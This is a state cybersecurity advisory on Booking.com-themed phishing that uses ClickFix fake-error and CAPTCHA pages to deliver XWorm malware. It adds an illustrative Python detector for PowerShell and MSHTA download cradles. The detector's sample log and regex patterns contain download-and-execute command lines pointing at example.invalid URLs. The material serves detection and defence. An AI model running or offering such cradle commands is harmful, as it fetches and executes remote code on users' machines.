In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware. The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.
The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. Multiple redirects and filtering steps occur before the target arrives at one of the numerous landing pages, which use various layouts and scripts. The URLs for the landing pages contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest. The threat actors use the ClickFix technique to display dialog boxes containing fake error messages that manipulate targets into following instructions to “fix” the problem. Sometimes they add an appearance of authenticity by using a fake CAPTCHA-themed ClickFix page that purports to verify the target. In reality, the target’s clicks copy, paste, or execute malicious payloads or scripts in the background. The payloads use PowerShell or MSHTA commands to download and execute XWorm malware.
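The execution chain described above leaves a recognizable trace on the endpoint: a PowerShell or MSHTA process launched from a user-facing parent such as explorer.exe (the Run dialog) or a terminal, with a command line that fetches and runs remote content. The following script, added here as an illustration and not part of the NJCCIC advisory or any NJCCIC tooling, scores Sysmon-style process-creation events against those traits. The JSON field names (Image, ParentImage, CommandLine, Computer), the sample log lines, the hostnames, and the example.invalid URLs are all constructed for the example.

```python
"""Flag ClickFix-style execution chains in constructed process-creation logs.

A ClickFix lure tricks the user into pasting a command into the Windows Run
dialog or a terminal; that command is usually a PowerShell or MSHTA download
cradle. Each event is scored on (a) which binary ran, (b) whether a user-driven
parent launched it, and (c) cradle traits in the command line. All log lines,
field names and hostnames below are constructed for this example.
"""
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Binaries the advisory names as the payload launchers (plus PowerShell 7).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Parents that indicate a user pasted the command rather than a scheduled task.
USER_LAUNCHED_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

# Command-line traits of a download-and-execute cradle: (regex, weight, label).
CRADLE_PATTERNS = [
    (re.compile(r"https?://", re.I), 2, "remote URL"),
    (re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I), 2, "download primitive"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 2, "inline execution"),
    (re.compile(r"-enc(odedcommand)?\b", re.I), 2, "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|bypass", re.I), 1, "evasion switch"),
]
ALERT_THRESHOLD = 4  # events scoring below this are treated as benign admin use


@dataclass
class Finding:
    host: str
    image: str
    parent: str
    score: int
    reasons: List[str] = field(default_factory=list)


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the event looks like a ClickFix cradle, else None."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return None
    cmd = event.get("CommandLine", "")
    score, reasons = 0, []
    if parent in USER_LAUNCHED_PARENTS:
        score += 2
        reasons.append(f"launched from {parent}")
    for pattern, weight, label in CRADLE_PATTERNS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    # mshta pointed at a URL is a cradle on its own; weight it accordingly.
    if image == "mshta.exe" and "remote URL" in reasons:
        score += 2
        reasons.append("mshta remote HTA")
    if score < ALERT_THRESHOLD:
        return None
    return Finding(event.get("Computer", "?"), image, parent, score, reasons)


def scan(lines) -> List[Finding]:
    """Parse one JSON event per line and collect the findings that alert."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the scan
        result = score_event(event)
        if result:
            findings.append(result)
    return findings


# Constructed sample events: two ClickFix-style cradles, one scheduled admin
# script, one unrelated process, and one encoded command below the threshold.
SAMPLE_LOG = [
    r'{"Computer": "WS-01", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -nop -c \"iwr http://example.invalid/book -UseBasicParsing | iex\""}',
    r'{"Computer": "WS-02", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta http://example.invalid/complaint.hta"}',
    r'{"Computer": "SRV-01", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -File C:\\Scripts\\backup.ps1"}',
    r'{"Computer": "WS-03", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}',
    r'{"Computer": "WS-04", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -enc AAAA"}',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host}: {f.image} <- {f.parent} score={f.score} ({', '.join(f.reasons)})")
```

The weighting is deliberate: an encoded PowerShell command from a service parent scores only 2 and stays below the threshold, while the same binary launched from explorer.exe with a URL and an inline-execution primitive scores 9. Tune ALERT_THRESHOLD and the parent list against your own baseline of legitimate Run-dialog usage before deploying a rule like this.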
Recommendations
- Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders.
- Exercise caution with communications from known senders.
- Confirm requests from senders via contact information obtained from verified and official sources.
- Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites.
- Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes.
- Reduce your digital footprint so threat actors cannot easily target you.
- Keep systems up to date and apply patches after appropriate testing.
- Report phishing emails and other malicious cyber activity to the FBI's IC3 and the NJCCIC.
